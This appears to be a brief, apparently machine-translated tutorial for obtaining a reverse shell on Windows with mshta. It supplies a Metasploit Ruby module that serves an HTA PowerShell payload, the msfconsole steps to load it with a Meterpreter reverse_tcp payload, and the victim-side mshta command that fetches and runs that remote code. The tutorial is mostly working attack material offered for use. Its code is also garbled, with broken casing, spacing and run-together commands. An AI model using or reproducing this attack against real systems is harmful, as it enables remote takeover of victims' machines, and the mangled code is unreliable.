Mshta Rebound Shell

Kali System Preparation:

Copy the following Ruby code into the/USR/SHARE/METASPLOIT-FRAMEWORK/MODULES/EXPLOITS/WINDOWS/SMB/MSH_SHELL.RB directory (note the code indentation OH):

# # # This module requires metasploit:https://metasploit.com/download# current source:https://github.com/rapid7/ metasploit-framework## class Metasploitmodule < Msf::exploit::remote Rank = normalranking include Msf::exploit: : Remote::httpserver def initialize (info = {}) Super (Update_info (info, ' Name ' = ' Microsoft Office Payload D Elivery ', ' Description ' =%q{This module generates an command to place within a Word document, tha t when executed, would retrieve a HTA payload via HTTP from a Web server.      Currently has not figured off how to generate a doc.        }, ' License ' = + msf_license, ' Arch ' = arch_x86, ' Platform ' = ' win ', ' Targets '    [[' Automatic ', {}],], ' defaulttarget ' = 0,) ' End def On_request_uri (CLI, _request) Print_status ("Delivering payload") P = regenerate_payload (CLI) data = MSF::UTIL::EXE.TO_EXECUTABLE_FMT (Framewo      RkArch_x86, ' win ', p.encoded, ' Hta-psh ', {: Arch = arch_x86,:p latform = ' Win '}) send_re  Sponse (CLI, data, ' content-type ' = ' Application/hta ') end def primer url = Get_uri print_status ("Place the Following DDE in an MS document: ") print_line (" Mshta.exe \ "#{url}\" ") endend

To start the MSF service on the command line:

Service PostgreSQL Start

Start MSF again:

sudo msfconsole

Reload All modules:

Reload_all

Find the Msh_shell module we just created:

Search Msh_shell

Load this module:

Use Exploit/windows/smb/msh_shell

Using Bounce Shellcode, configure the native address, configure the URI address

set payload windows/meterpreter/reverse_tcpset192.168. 0.105 Set Uripath Aaaaexploit

Window System:

Open the Run command and execute:

Mshta http://Kali system ip/aaaa

The Kali system will receive a shell of the window system

Mshta Rebound Shell